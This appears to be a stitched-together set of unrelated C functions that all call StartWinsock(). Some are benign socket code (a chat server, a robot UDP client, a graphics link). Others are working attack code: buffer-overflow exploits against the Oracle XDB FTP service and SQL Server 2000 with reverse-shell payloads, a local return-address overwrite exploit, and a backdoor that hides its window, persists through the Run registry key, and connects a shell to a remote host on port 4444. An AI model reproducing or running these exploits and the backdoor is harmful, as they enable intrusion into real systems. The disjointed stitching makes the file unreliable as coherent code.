int main(int argc, char *argv[]) { if(argc != 6) { printf("\n\n\tOracle XDB FTP Service UNLOCK Buffer Overflow Exploit"); printf("\n\t\tfor Blackhat (http://www.blackhat.com)"); printf("\n\n\tSpawns a reverse shell to specified port"); printf("\n\n\tUsage:\t%s host userid password ipaddress port",argv[0]); printf("\n\n\tDavid Litchfield\n\t([email protected])"); printf("\n\t6th July 2003\n\n\n"); return 0; } strncpy(host,argv[1],250); if(StartWinsock()==0) return printf("Error starting Winsock.\n"); SetUpExploit(argv[4],atoi(argv[5])); strcat(exploit_code,short_jump); strcat(exploit_code,exception_handler); strcat(exploit_code,exploit); strcat(exploit_code,"\r\n"); GainControlOfOracle(argv[2],argv[3]); return 0; }
int main(int argc, char *argv[]) { int cnt = 0; unsigned char buffer[1000]=""; if(argc !=3) return 0; StartWinsock(); // Set the IP address and port in the exploit code // If your IP address has a NULL in it then the // string will be truncated. SetUpExploit(argv[1],atoi(argv[2])); // name of the vulnerable program strcpy(buffer,"nes "); // copy exploit code to the buffer strcat(buffer,exploit); // Pad out the buffer while(cnt < 25) { strcat(buffer,"\x90\x90\x90\x90"); cnt ++; } strcat(buffer,"\x90\x90\x90\x90"); // Here's where we overwrite the saved return address // This is the address of lstrcatA on Windows XP SP 1 // 0x77E74B66 strcat(buffer,"\x66\x4B\xE7\x77"); // Set the return address for lstrcatA // this is where our code will be copied to // in the TEB strcat(buffer,"\xBC\xE1\xFD\x7F"); // Set the destination buffer for lstrcatA // This is in the TEB and we'll return to // here. strcat(buffer,"\xBC\xE1\xFD\x7F"); // This is our source buffer. This is the address // where we find our original buffer on the stack strcat(buffer,"\x10\xFB\x12"); // Now execute the vulnerable program! WinExec(buffer,SW_MAXIMIZE); return 0; }
int EntryPoint(void) { SOCKET s; StartLogger(TEXT(LOGFILE)); if(StartWinsock() != 0) return -1; s = CreateListenSocket(SERVER_PORT); if((s == SOCKET_ERROR) || (s == INVALID_SOCKET)) return -1; ServerLoop(s); WSACleanup(); return 1; }
int main(int argc, char **argv) { SOCKET s; char *remote; if(argc > 1) remote = argv[1]; else remote = REMOTE_ADDR; printf("Starting Winsock... "); if(StartWinsock() != 0) { printf("Failed.\n"); return EXIT_FAILURE; } printf("OK.\n"); printf("Connecting to %s:%d... ", remote, SERVER_PORT); if((s = CreateConnectSocket(remote, SERVER_PORT)) == SOCKET_ERROR) { printf("Failed.\n"); return EXIT_FAILURE; } printf("OK.\n\n"); if(ClientHandshake(s)) CommandLoop(s); WSACleanup(); if(conn.dh_remote_key) free(conn.dh_remote_key); if(conn.dh_shared_key) free(conn.dh_shared_key); if(conn.nonce) free(conn.nonce); #ifdef _DEBUG showmemstats(stdout); #endif return EXIT_SUCCESS; }
friUdp::friUdp(int port, char * remoteHost) : serverPort(port) { /* check struct sizes */ if (!FRI_CHECK_SIZES_OK) { printf("data structure size error!\n"); exit(1); } m_timestamp=0; // Make shure, that e.g. simulink uses no stupid standard definition - e.g. 0 if ( serverPort < 10 ) { serverPort=FRI_DEFAULT_SERVER_PORT; } #ifdef WIN32 StartWinsock(); #endif Init(remoteHost); }
// Return port number listening on, return 0 if failed to listen int StartListen(int Port) { // If winsock doesn't start return false if (!StartWinsock()) return 0; // Limit port to 1-32767 range if ((Port < 1) || (Port > 32767)) Port = 80; SocketListen = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if (SocketListen == INVALID_SOCKET) { SocketListen = NULL; return 0; } sockaddr_in SockAddr; SockAddr.sin_family = AF_INET; SockAddr.sin_port = htons(Port); SockAddr.sin_addr.S_un.S_addr = INADDR_ANY; int Result = bind(SocketListen, (sockaddr*)(&SockAddr), sizeof(SockAddr)); if (Result != 0) { CloseWinsock(); SocketListen = NULL; return 0; } listen(SocketListen, 1); WSAAsyncSelect(SocketListen, fMain, WM_SOCKET, FD_CONNECT | FD_ACCEPT); return Port; };
int main() { //Testausgabe printf("Socket Client\n"); //Variablen initialisieren long returnvalue; char buf[256]; SOCKET acceptSocket; SOCKET connectedSocket; SOCKADDR_IN addr; //Socket Verfügbarkeit prüfen returnvalue = StartWinsock(); if(returnvalue != 0) { printf("Fehler: StartWinsock Fehlercode: %d!\n",returnvalue); return 1; } else { printf("Winsock gestartet!\n"); } //Socket initialisieren acceptSocket = socket(AF_INET,SOCK_STREAM,0); if(acceptSocket == INVALID_SOCKET) { printf("Fehler: Der Socket konnte nicht erstellt werden, fehler code: %d\n",WSAGetLastError()); return 1; } else { printf("Socket erstellt!\n"); } //Verbindung initialisieren memset(&addr,0,sizeof(SOCKADDR_IN)); addr.sin_family = AF_INET; addr.sin_port = htons(12345); addr.sin_addr.s_addr = ADDR_ANY; returnvalue = bind(acceptSocket,(SOCKADDR*)&addr,sizeof(SOCKADDR_IN)); if(returnvalue == SOCKET_ERROR) { printf("Fehler: bind, fehler code: %d\n",WSAGetLastError()); return 1; } else { printf("Socket an port 12345 gebunden\n"); } //Verbindung bereitstellen returnvalue = listen(acceptSocket,10); if(returnvalue == SOCKET_ERROR) { printf("Fehler listen, fehler code: %d",WSAGetLastError()); return 1; } else { printf("AcceptSocket ist im Listen-Modus ...\n"); } //Auf Verbindung warten und herstellen connectedSocket = accept(acceptSocket,NULL,NULL); if(connectedSocket == INVALID_SOCKET) { printf("Fehler: accept, fehler code: %d\n",WSAGetLastError()); return 1; } else { printf("Neue Verbindung wurde akzeptiert!\n"); } //FUNKTION: Endlos-Chat while(1) { //Warten auf Input printf("[-] Warte auf Input ...\n\n"); memset(buf,0,sizeof(buf)); returnvalue = recv(connectedSocket,buf,255,0); if(returnvalue == 0 || returnvalue == SOCKET_ERROR) { printf("Fehler: recv, fehler code: %d\n",WSAGetLastError()); } else { buf[returnvalue]=0; printf("Antwort: %s\n\n",buf); } //Senden von Output printf("Senden: "); fgets(buf,255,stdin); send(connectedSocket,buf,255,0); printf("\nNachricht gesendet!\n\n"); } //Programmende printf("\n"); return 0; }
int main(int argc, char** argv) { char dyndns[] ="www.youradress.com"; //Get the CWD and append the new Filename for the Copy-Method of the exe itself. //Note: Ugly one... leave it in his dark place alone and hope it will die someday.. char * buffer; buffer = _getcwd(NULL, 0); int counter =0; for(int i = 0;;i++) { if(counter == 2) { if(buffer[i] == '\\' || buffer[i] == '>') { buffer[i] = 0; break; } } if(buffer[i]=='\\') { counter++; } } strcat(buffer,"\\yourfilename.exe"); CopyFileA(argv[0],buffer,false); #if !DEBUG //Hideing the console window HWND hWnd = GetConsoleWindow(); ShowWindow( hWnd, SW_HIDE ); //Setting the console name for fun and profit //char name[]="SPARTA"; //SetConsoleTitleA(name); char subkey[]= "Software\\Microsoft\\Windows\\CurrentVersion\\Run"; //char cwd[1024]; //char asf[] = "lolololol"; //_getcwd(cwd,1024); //strcat(cwd,"\\"); //strcpy(cwd,**argv); //strcat(cwd,argv[0]); DWORD shit=0; RegSetValueA(HKEY_CURRENT_USER,subkey,REG_SZ, buffer, shit); #endif //Testausgabe #if DEBUG printf("Socket Client\n"); #endif //Variablen initialisieren long returnvalue; SOCKADDR_IN addr; SECURITY_ATTRIBUTES saAttr; #if DEBUG printf("\n->Start of parent execution.\n"); #endif // Set the bInheritHandle flag so pipe handles are inherited. saAttr.nLength = sizeof(SECURITY_ATTRIBUTES); saAttr.bInheritHandle = TRUE; saAttr.lpSecurityDescriptor = NULL; // Create a pipe for the child process's STDOUT. if ( ! CreatePipe(&g_hChildStd_OUT_Rd, &g_hChildStd_OUT_Wr, &saAttr, 0) ) exit(2); // Ensure the read handle to the pipe for STDOUT is not inherited. if ( ! SetHandleInformation(g_hChildStd_OUT_Rd, HANDLE_FLAG_INHERIT, 0) ) exit(3); // Create a pipe for the child process's STDIN. if (! CreatePipe(&g_hChildStd_IN_Rd, &g_hChildStd_IN_Wr, &saAttr, 0)) exit(4); // Ensure the write handle to the pipe for STDIN is not inherited. if ( ! SetHandleInformation(g_hChildStd_IN_Wr, HANDLE_FLAG_INHERIT, 0) ) exit(5); // Create the child process. CreateChildProcess(); //Weitere SOCKET Abhandlungen... //Socket Verfügbarkeit prüfen do { returnvalue = StartWinsock(); if(returnvalue != 0) { #if DEBUG printf("[-] Fehler: StartWinsock Fehlercode: %d!\n",returnvalue); #endif Sleep(60000); } #if DEBUG else { printf("[+] Winsock gestartet!\n"); } #endif } while(returnvalue != 0); //Socket initialisieren do { sock = socket(AF_INET,SOCK_STREAM,0); if(sock == INVALID_SOCKET) { #if DEBUG printf("[-] Fehler: Der Socket konnte nicht erstellt werden, fehler code: %d\n",WSAGetLastError()); #endif Sleep(60000); } #if DEBUG else { printf("[+] Socket erstellt!\n"); } #endif } while(sock == INVALID_SOCKET); //Port und IP übergabe memset(&addr,0,sizeof(SOCKADDR_IN)); addr.sin_family = AF_INET; addr.sin_port = htons(4444); //addr.sin_addr.s_addr = inet_addr("127.0.0.1"); do { returnvalue = getAddrFromString(dyndns,&addr); if(returnvalue == SOCKET_ERROR) { #if DEBUG printf("[-] Fehler: IP für %s konnte nicht aufgeloest werden.\n"); #endif Sleep(60000); } #if DEBUG else { printf("[+] IP aufgelöst!\n"); } #endif } while(returnvalue == SOCKET_ERROR); //Verbindungsaufbau do { returnvalue = connect(sock, (SOCKADDR*)&addr, sizeof(SOCKADDR)); if(returnvalue == SOCKET_ERROR) { #if DEBUG printf("[-] Fehler: connect gescheitert, fehler code: %d\n",WSAGetLastError()); #endif Sleep(60000); } #if DEBUG else { printf("[+] Verbindung hergestellt mit %s\n",argv[1]); } #endif } while(returnvalue == SOCKET_ERROR); for(;;) { #if DEBUG //Warten auf Input printf("[-] Warte auf Input ...\n\n"); #endif WriteToPipe(); ReadFromPipe(); if(exitOnForce) { #if DEBUG printf("\n->SYSTEM GOING DOWN!\n"); #endif break; } } #if DEBUG printf("\n->End of parent execution.\n"); #endif // The remaining open handles are cleaned up when this process terminates. // To avoid resource leaks in a larger application, close handles explicitly. return 0; }
int main(int argc, char *argv[]) { unsigned int ErrorLevel=0,len=0,c =0; int count = 0; char sc[300]=""; char ipaddress[40]=""; unsigned short port = 0; unsigned int ip = 0; char *ipt=""; char buffer[400]=""; unsigned short prt=0; char *prtt=""; if(argc != 2 && argc != 5) { printf("===============================================================\r\n"); printf("SQL Server UDP Buffer Overflow Remote Exploit\r\n\n"); printf("Modified from \"Advanced Windows Shellcode\"\r\n"); printf("Code by David Litchfield, [email protected]\r\n"); printf("Modified by lion, fix a bug.\r\n"); printf("Welcome to HUC Website http://www.cnhonker.com\r\n\n"); printf("Usage:\r\n"); printf(" %s Target [<NCHost> <NCPort> <SQLSP>]\r\n\n", argv[0]); printf("Exemple:\r\n"); printf("Target is MSSQL SP 0:\r\n"); printf(" C:\\>nc -l -p 53\r\n"); printf(" C:\\>%s db.target.com 202.202.202.202 53 0\r\n",argv[0]); printf("Target is MSSQL SP 1 or 2:\r\n"); printf(" c:\\>%s db.target.com 202.202.202.202\r\n\n", argv[0]); return 0; } strncpy(host, argv[1], 100); if(argc == 5) { strncpy(ipaddress, argv[2], 36); port = atoi(argv[3]); // SQL Server 2000 Service pack level // The import entry for GetProcAddress in sqlsort.dll // is at 0x42ae1010 but on SP 1 and 2 is at 0x42ae101C // Need to set the last byte accordingly if(argv[4][0] == 0x30) { printf("MSSQL SP 0. GetProcAddress @0x42ae1010\r\n"); exploit_code[9]=0x10; } else { printf("MSSQL SP 1 or 2. GetProcAddress @0x42ae101C\r\n"); } } ErrorLevel = StartWinsock(); if(ErrorLevel==0) { printf("Starting Winsock Error.\r\n"); return 0; } if(argc == 2) { strcpy(request,ping); GainControlOfSQL(); return 0; } strcpy(buffer,exploit_code); // set this IP address to connect back to // this should be your address ip = inet_addr(ipaddress); ipt = (char*)&ip; buffer[142]=ipt[0]; buffer[143]=ipt[1]; buffer[144]=ipt[2]; buffer[145]=ipt[3]; // set the TCP port to connect on // netcat should be listening on this port // e.g. nc -l -p 80 prt = htons(port); prt = prt ^ 0xFFFF; prtt = (char *) &prt; buffer[160]=prtt[0]; buffer[161]=prtt[1]; strcat(request,"AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXX"); // Overwrite the saved return address on the stack // This address contains a jmp esp instruction // and is in sqlsort.dll. strcat(request,"\xDC\xC9\xB0\x42"); // 0x42B0C9DC // Need to do a near jump strcat(request,"\xEB\x0E\x41\x42\x43\x44\x45\x46"); // Need to set an address which is writable or // sql server will crash before we can exploit // the overrun. Rather than choosing an address // on the stack which could be anywhere we'll // use an address in the .data segment of sqlsort.dll // as we're already using sqlsort for the saved // return address // SQL 2000 no service packs needs the address here strcat(request,"\x01\x70\xAE\x42"); // SQL 2000 Service Pack 2 needs the address here strcat(request,"\x01\x70\xAE\x42"); // just a few nops strcat(request,"\x90\x90\x90\x90\x90\x90\x90\x90"); // tack on exploit code to the end of our request and fire it off strcat(request,buffer); GainControlOfSQL(); return 0; }
DirectResult voodoo_link_init_connect( VoodooLink *link, const char *hostname, int port, bool raw ) { int ret; struct sockaddr_in addr; Link *l; D_INFO( "Voodoo/Link: Connecting to '%s:%d'...\n", hostname, port ); StartWinsock(); l = D_CALLOC( 1, sizeof(Link) ); if (!l) return D_OOM(); l->socket = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP ); if (l->socket == INVALID_SOCKET) { ret = errno2result( errno ); D_PERROR( "Voodoo/Link: Socket creation failed!\n" ); D_FREE( l ); return ret; } addr.sin_family = AF_INET; addr.sin_addr.s_addr = inet_addr( hostname ); addr.sin_port = htons( port ); ret = connect( l->socket, (const struct sockaddr*) &addr, sizeof(addr) ); if (ret < 0) { ret = errno2result( errno ); D_PERROR( "Voodoo/Link: Socket connect failed!\n" ); // FIXME: how to close the socket? D_FREE( l ); return ret; } direct_mutex_init( &l->lock ); l->event = WSACreateEvent(); if (!raw) { link->code = 0x80008676; if (send( l->socket, (const char*) &link->code, sizeof(link->code), 0 ) != 4) { D_ERROR( "Voodoo/Link: Coult not write initial four bytes!\n" ); // FIXME: how to close the socket? D_FREE( l ); return DR_IO; } } link->priv = l; link->Close = Close; link->Read = Read; link->Write = Write; link->SendReceive = SendReceive; link->WakeUp = WakeUp; link->WaitForData = WaitForData; return DR_OK; }